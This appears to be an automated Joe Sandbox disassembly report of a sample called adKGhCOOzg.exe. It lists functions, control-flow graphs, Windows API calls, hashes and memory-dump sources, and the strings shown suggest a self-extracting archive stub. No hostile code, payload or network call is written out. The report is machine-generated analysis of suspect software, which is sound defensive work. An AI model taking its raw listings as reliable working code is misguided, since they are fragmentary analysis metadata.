                                    • String ID: $.exe$.inf
                                    • API String ID: 3686203788-2452507128
                                    • Opcode ID: 418a75aa0dab07fcba247e6708d1cf2c5a649036a7567cec55e7c469d55a0769
                                    • Instruction ID: f1ee4ef18471d9c443d3939f097ec3406a665a96ba0aa0b2714253d9c71c81a8
                                    • Opcode Fuzzy Hash: 418a75aa0dab07fcba247e6708d1cf2c5a649036a7567cec55e7c469d55a0769
                                    • Instruction Fuzzy Hash: C261C1704143809ED733DF24D801EABBBE9AB8534AF05581AFCC5972B1D7B1998DCB92
                                    Function 0036A058 Relevance: 9.2, APIs: 6, Instructions: 216COMMONLIBRARYCODE
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 870 36a058-36a071 871 36a087-36a08c 870->871 872 36a073-36a083 call 36e6ed 870->872 873 36a08e-36a096 871->873 874 36a099-36a0bd MultiByteToWideChar 871->874 872->871 882 36a085 872->882 873->874 876 36a0c3-36a0cf 874->876 877 36a250-36a263 call 35ec4a 874->877 879 36a123 876->879 880 36a0d1-36a0e2 876->880 886 36a125-36a127 879->886 883 36a0e4-36a0f3 call 371a30 880->883 884 36a101-36a112 call 368518 880->884 882->871 887 36a245 883->887 897 36a0f9-36a0ff 883->897 884->887 898 36a118 884->898 886->887 888 36a12d-36a140 MultiByteToWideChar 886->888 892 36a247-36a24e call 36a2c0 887->892 888->887 891 36a146-36a158 call 36a72c 888->891 899 36a15d-36a161 891->899 892->877 901 36a11e-36a121 897->901 898->901 899->887 902 36a167-36a16e 899->902 901->886 903 36a170-36a175 902->903 904 36a1a8-36a1b4 902->904 903->892 905 36a17b-36a17d 903->905 906 36a1b6-36a1c7 904->906 907 36a200 904->907 905->887 908 36a183-36a19d call 36a72c 905->908 910 36a1e2-36a1f3 call 368518 906->910 911 36a1c9-36a1d8 call 371a30 906->911 909 36a202-36a204 907->909 908->892 925 36a1a3 908->925 914 36a206-36a21f call 36a72c 909->914 915 36a23e-36a244 call 36a2c0 909->915 910->915 924 36a1f5 910->924 911->915 923 36a1da-36a1e0 911->923 914->915 928 36a221-36a228 914->928 915->887 927 36a1fb-36a1fe 923->927 924->927 925->887 927->909 929 36a264-36a26a 928->929 930 36a22a-36a22b 928->930 931 36a22c-36a23c WideCharToMultiByte 929->931 930->931 931->915 932 36a26c-36a273 call 36a2c0 931->932 932->892
                                    APIs
                                    • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00364E35,00364E35,?,?,?,0036A2A9,00000001,00000001,3FE85006), ref: 0036A0B2
                                    • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0036A2A9,00000001,00000001,3FE85006,?,?,?), ref: 0036A138
                                    • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,3FE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0036A232
                                    • __freea.LIBCMT ref: 0036A23F
                                      • Part of subcall function 00368518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0036C13D,00000000,?,003667E2,?,00000008,?,003689AD,?,?,?), ref: 0036854A
                                    • __freea.LIBCMT ref: 0036A248
                                    • __freea.LIBCMT ref: 0036A26D
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: ByteCharMultiWide__freea$AllocateHeap
                                    • String ID:
                                    • API String ID: 1414292761-0
                                    • Opcode ID: 7735efafb73663300220016a3b6c0b6f36609b6b81521e49d1d7a3ae749d8152
                                    • Instruction ID: df13e0bd7f5ac18d1998ed48bb4be9ff9cd24389b4029b423cf403e117a55233
                                    • Opcode Fuzzy Hash: 7735efafb73663300220016a3b6c0b6f36609b6b81521e49d1d7a3ae749d8152
                                    • Instruction Fuzzy Hash: 3B511572640A06AFDB278F64CC51FBF77A9EB45750F158A28FC04EA148DB35DC40CAA2
                                    Function 0035A2C7 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 36COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 935 35a2c7-35a2e6 GetClassNameW 936 35a30e-35a310 935->936 937 35a2e8-35a2fd call 3517ac 935->937 938 35a312-35a314 936->938 939 35a31b-35a31f 936->939 942 35a30d 937->942 943 35a2ff-35a30b FindWindowExW 937->943 938->939 942->936 943->942
                                    APIs
                                    • GetClassNameW.USER32(?,?,00000050), ref: 0035A2DE
                                    • SHAutoComplete.SHLWAPI(?,00000010), ref: 0035A315
                                      • Part of subcall function 003517AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,0034BB05,00000000,.exe,?,?,00000800,?,?,003585DF,?), ref: 003517C2
                                    • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 0035A305
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: AutoClassCompareCompleteFindNameStringWindow
                                    • String ID: @Uxu$EDIT
                                    • API String ID: 4243998846-59804995
                                    • Opcode ID: 1b53ad8a177d663ae87d25d42bc8ab877d4d7a4feb380ebbc878a7971cc9d3cb
                                    • Instruction ID: 37455d2c8ffd0705b916460217fffcbef741b1d5b172ea35dbd17e15d801dcfc
                                    • Opcode Fuzzy Hash: 1b53ad8a177d663ae87d25d42bc8ab877d4d7a4feb380ebbc878a7971cc9d3cb
                                    • Instruction Fuzzy Hash: 84F02736A0162877E73296289C05FDB736C9F47B01F050156BD04E2190D760AD49D6F6
                                    Function 003499B0 Relevance: 7.6, APIs: 5, Instructions: 117filetimeCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 944 3499b0-3499d1 call 35e360 947 3499d3-3499d6 944->947 948 3499dc 944->948 947->948 949 3499d8-3499da 947->949 950 3499de-3499fb 948->950 949->950 951 349a03-349a0d 950->951 952 3499fd 950->952 953 349a12-349a31 call 3470bf 951->953 954 349a0f 951->954 952->951 957 349a33 953->957 958 349a39-349a57 CreateFileW 953->958 954->953 957->958 959 349a59-349a7b GetLastError call 34b66c 958->959 960 349abb-349ac0 958->960 968 349a7d-349a9f CreateFileW GetLastError 959->968 969 349aaa-349aaf 959->969 961 349ae1-349af5 960->961 962 349ac2-349ac5 960->962 966 349af7-349b0f call 34fe56 961->966 967 349b13-349b1e 961->967 962->961 965 349ac7-349adb SetFileTime 962->965 965->961 966->967 971 349aa5-349aa8 968->971 972 349aa1 968->972 969->960 973 349ab1 969->973 971->960 971->969 972->971 973->960
                                    APIs
                                    • CreateFileW.KERNELBASE(?,?,?,00000000,00000003,?,00000000,?,00000000,?,?,003478AD,?,00000005,?,00000011), ref: 00349A4C
                                    • GetLastError.KERNEL32(?,?,003478AD,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00349A59
                                    • CreateFileW.KERNEL32(?,?,?,00000000,00000003,?,00000000,?,?,00000800,?,?,003478AD,?,00000005,?), ref: 00349A8E
                                    • GetLastError.KERNEL32(?,?,003478AD,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00349A96
                                    • SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,003478AD,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00349ADB
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: File$CreateErrorLast$Time
                                    • String ID:
                                    • API String ID: 1999340476-0
                                    • Opcode ID: fa61c9c8e4f35d851d79edd42dfe8285d058a21ec8514745cf685020f144a6f2
                                    • Instruction ID: ef072e1fac7e3f40f1302e28159e3f4b752f3a0952d271b6236cddc173ccaeab
                                    • Opcode Fuzzy Hash: fa61c9c8e4f35d851d79edd42dfe8285d058a21ec8514745cf685020f144a6f2
                                    • Instruction Fuzzy Hash: AF4133305447466FE7328B20CC0ABDBBBD4BB05324F11071AF9E59A1D1E7B5B988CB91
                                    Function 0035AC74 Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1003 35ac74-35ac8d PeekMessageW 1004 35ac8f-35aca3 GetMessageW 1003->1004 1005 35acc8-35accc 1003->1005 1006 35aca5-35acb2 IsDialogMessageW 1004->1006 1007 35acb4-35acc2 TranslateMessage DispatchMessageW 1004->1007 1006->1005 1006->1007 1007->1005
                                    APIs
                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0035AC85
                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0035AC96
                                    • IsDialogMessageW.USER32(00010420,?), ref: 0035ACAA
                                    • TranslateMessage.USER32(?), ref: 0035ACB8
                                    • DispatchMessageW.USER32(?), ref: 0035ACC2
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: Message$DialogDispatchPeekTranslate
                                    • String ID:
                                    • API String ID: 1266772231-0
                                    • Opcode ID: 897a38f63042bc5785ec4c2bbb17c44980b00f04f27ab3c4cd5ea82cdb6be0f4
                                    • Instruction ID: 9e23e28fcb562e7352a6531187dae328c5c9d67ff8a1764a4d442e4314b1bcfa
                                    • Opcode Fuzzy Hash: 897a38f63042bc5785ec4c2bbb17c44980b00f04f27ab3c4cd5ea82cdb6be0f4
                                    • Instruction Fuzzy Hash: 65F03071D02229AB8B21DBE6DC4CDEB7F6CEE06751B414515F915D3110EB34D409C7B1
                                    Function 003676BD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1008 3676bd-3676ca 1009 3676cc-3676d0 1008->1009 1010 3676e8-367711 call 36b290 GetModuleFileNameA 1008->1010 1009->1010 1011 3676d2-3676e3 call 36895a call 368839 1009->1011 1016 367713-367716 1010->1016 1017 367718 1010->1017 1023 3677dc-3677e0 1011->1023 1016->1017 1019 36771a-367744 call 3677e1 call 367956 1016->1019 1017->1019 1026 367746-367750 call 36895a 1019->1026 1027 367752-36776f call 3677e1 1019->1027 1032 367783-367785 1026->1032 1033 367787-36779a call 36ada3 1027->1033 1034 367771-36777e 1027->1034 1035 3677d1-3677db call 3684de 1032->1035 1040 3677a1-3677aa 1033->1040 1041 36779c-36779f 1033->1041 1034->1032 1035->1023 1042 3677b4-3677c1 1040->1042 1043 3677ac-3677b2 1040->1043 1044 3677c7-3677ce call 3684de 1041->1044 1042->1044 1043->1042 1043->1043 1044->1035
                                    APIs
                                    • GetModuleFileNameA.KERNELBASE(00000000,C:\Users\user\Desktop\adKGhCOOzg.exe,00000104), ref: 003676FD
                                    • _free.LIBCMT ref: 003677C8
                                    • _free.LIBCMT ref: 003677D2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: _free$FileModuleName
                                    • String ID: C:\Users\user\Desktop\adKGhCOOzg.exe
                                    • API String ID: 2506810119-3508314198
                                    • Opcode ID: 6a9fa69ab26f0f780785db20c6769395edc90ad89126ec31aa5de1ee1c3075e8
                                    • Instruction ID: 3c4e8bbbe685536469f6afaf494cfa1be2f9b1a1c89c57d2b457fcb1740cb72d
                                    • Opcode Fuzzy Hash: 6a9fa69ab26f0f780785db20c6769395edc90ad89126ec31aa5de1ee1c3075e8
                                    • Instruction Fuzzy Hash: 3D319271A08218AFDB23DF99DC819AEBBFCEB85714F558166F804EB215DA704E40CB90
                                    Function 0035A335 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35comCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    APIs
                                      • Part of subcall function 00350085: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 003500A0
                                      • Part of subcall function 00350085: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0034EB86,Crypt32.dll,00000000,0034EC0A,?,?,0034EBEC,?,?,?), ref: 003500C2
                                    • OleInitialize.OLE32(00000000), ref: 0035A34E
                                    • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0035A385
                                    • SHGetMalloc.SHELL32(00388430), ref: 0035A38F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
                                    • String ID: riched20.dll
                                    • API String ID: 3498096277-3360196438
                                    • Opcode ID: ab5761fd13540cafcf14d021d590e82ee0cc8d55b6d9fb2d38bbc3066baed306
                                    • Instruction ID: f2bdbbeccf3f8d72b41c2ece605ec94f83ead1cc320b5f6143dc01f32f54c5fd
                                    • Opcode Fuzzy Hash: ab5761fd13540cafcf14d021d590e82ee0cc8d55b6d9fb2d38bbc3066baed306
                                    • Instruction Fuzzy Hash: 97F0F9B1D00209ABCB11AF99D8499EFFBFCEF95701F00415AE814E2251DBB456098FA1
                                    Function 0035D287 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 32COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1051 35d287-35d2b2 call 35e360 SetEnvironmentVariableW call 34fbd8 1055 35d2b7-35d2bb 1051->1055 1056 35d2bd-35d2c1 1055->1056 1057 35d2df-35d2e3 1055->1057 1058 35d2ca-35d2d1 call 34fcf1 1056->1058 1061 35d2c3-35d2c9 1058->1061 1062 35d2d3-35d2d9 SetEnvironmentVariableW 1058->1062 1061->1058 1062->1057
                                    APIs
                                    • SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 0035D29D
                                    • SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 0035D2D9
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: EnvironmentVariable
                                    • String ID: sfxcmd$sfxpar
                                    • API String ID: 1431749950-3493335439
                                    • Opcode ID: 7a333dfb9757a0d7fb61f280280c7fdd001e3377f50c4bccb95c7a317ece4c3c
                                    • Instruction ID: 121c359baa174b8330be8851ca110e9b73d300a245007ba6922ea39f8790e362
                                    • Opcode Fuzzy Hash: 7a333dfb9757a0d7fb61f280280c7fdd001e3377f50c4bccb95c7a317ece4c3c
                                    • Instruction Fuzzy Hash: 85F0A771801228A6C7332F909C09EFA779CEF09742F044451FC885A261D665DD40D7F1
                                    Function 0034984E Relevance: 6.1, APIs: 4, Instructions: 57fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetStdHandle.KERNEL32(000000F6), ref: 0034985E
                                    • ReadFile.KERNELBASE(?,?,00000001,?,00000000), ref: 00349876
                                    • GetLastError.KERNEL32 ref: 003498A8
                                    • GetLastError.KERNEL32 ref: 003498C7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: ErrorLast$FileHandleRead
                                    • String ID:
                                    • API String ID: 2244327787-0
                                    • Opcode ID: bc6902d23aaf4c9d2ba22f0c4b9c717349ead793d219cc10e902ee0c1fb756b8
                                    • Instruction ID: 125a7e5f6af8858b5553729087bde1c3d98d54a237f264e0531d1ad03a02952d
                                    • Opcode Fuzzy Hash: bc6902d23aaf4c9d2ba22f0c4b9c717349ead793d219cc10e902ee0c1fb756b8
                                    • Instruction Fuzzy Hash: E1117031900208EBDB235B59C804B6B77ECFB47731F10862BF46A8D990D735AE409F52
                                    Function 0036A4F4 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,0034CFE0,00000000,00000000,?,0036A49B,0034CFE0,00000000,00000000,00000000,?,0036A698,00000006,FlsSetValue), ref: 0036A526
                                    • GetLastError.KERNEL32(?,0036A49B,0034CFE0,00000000,00000000,00000000,?,0036A698,00000006,FlsSetValue,00377348,00377350,00000000,00000364,?,00369077), ref: 0036A532
                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0036A49B,0034CFE0,00000000,00000000,00000000,?,0036A698,00000006,FlsSetValue,00377348,00377350,00000000), ref: 0036A540
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: LibraryLoad$ErrorLast
                                    • String ID:
                                    • API String ID: 3177248105-0
                                    • Opcode ID: c489d4109dc1da900b4eafd1f8b25f88a9046f63f19e02bdeed3d03ce681b384
                                    • Instruction ID: 9db3f52cf67d93f39360d6c41957659bdc52621f6fd226f2dcd9409974f79c65
                                    • Opcode Fuzzy Hash: c489d4109dc1da900b4eafd1f8b25f88a9046f63f19e02bdeed3d03ce681b384
                                    • Instruction Fuzzy Hash: 0A01F732651A26ABC733CA699C44A567B9CEF47BA1F118520FA8BE3144D721D900CEE1
                                    Function 0036B188 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 91COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00368FA5: GetLastError.KERNEL32(?,00380EE8,00363E14,00380EE8,?,?,00363713,00000050,?,00380EE8,00000200), ref: 00368FA9
                                      • Part of subcall function 00368FA5: _free.LIBCMT ref: 00368FDC
                                      • Part of subcall function 00368FA5: SetLastError.KERNEL32(00000000,?,00380EE8,00000200), ref: 0036901D
                                      • Part of subcall function 00368FA5: _abort.LIBCMT ref: 00369023
                                      • Part of subcall function 0036B2AE: _abort.LIBCMT ref: 0036B2E0
                                      • Part of subcall function 0036B2AE: _free.LIBCMT ref: 0036B314
                                      • Part of subcall function 0036AF1B: GetOEMCP.KERNEL32(00000000,?,?,0036B1A5,?), ref: 0036AF46
                                    • _free.LIBCMT ref: 0036B200
                                    • _free.LIBCMT ref: 0036B236
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: _free$ErrorLast_abort
                                    • String ID: 7
                                    • API String ID: 2991157371-2922071456
                                    • Opcode ID: 6188ad926fadc27284a9df733a0e78d5734ed74da11748d66c6307f7b3a3989c
                                    • Instruction ID: 7b414c36d07114938cd10b637f464d2037a104219b6e8bbfa76860983c71b554
                                    • Opcode Fuzzy Hash: 6188ad926fadc27284a9df733a0e78d5734ed74da11748d66c6307f7b3a3989c
                                    • Instruction Fuzzy Hash: 18310731900104AFDB13EF69C851A5DF7E4EF05320F268199E4149F296DB715D81CF50
                                    Function 00349F2F Relevance: 4.6, APIs: 3, Instructions: 107fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetStdHandle.KERNEL32(000000F5,?,00000001,?,?,0034CC94,00000001,?,?,?,00000000,00354ECD,?,?,?), ref: 00349F4C
                                    • WriteFile.KERNEL32(?,?,?,00000000,00000000,?,?,00000000,00354ECD,?,?,?,?,?,00354972,?), ref: 00349F8E
                                    • WriteFile.KERNELBASE(?,?,?,00000000,00000000,?,?,?,00000001,?,?,0034CC94,00000001,?,?), ref: 00349FB8
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: FileWrite$Handle
                                    • String ID:
                                    • API String ID: 4209713984-0
                                    • Opcode ID: 040cb2216f663f3644f4824fbb7597038b0ae2e4490968da72cfc7d5af2118f4
                                    • Instruction ID: f2b417d35618168e69943ec46fbe5d482fb1fb06d7dc1751fe23f94f7aa645fe
                                    • Opcode Fuzzy Hash: 040cb2216f663f3644f4824fbb7597038b0ae2e4490968da72cfc7d5af2118f4
                                    • Instruction Fuzzy Hash: E73102312083059BDF268F24D848B6BBBE8EB91711F04455AF9499E281C770E84CCBA2
                                    Function 0034A207 Relevance: 4.6, APIs: 3, Instructions: 56COMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,0034A113,?,00000001,00000000,?,?), ref: 0034A22E
                                    • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,0034A113,?,00000001,00000000,?,?), ref: 0034A261
                                    • GetLastError.KERNEL32(?,?,?,?,0034A113,?,00000001,00000000,?,?), ref: 0034A27E
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
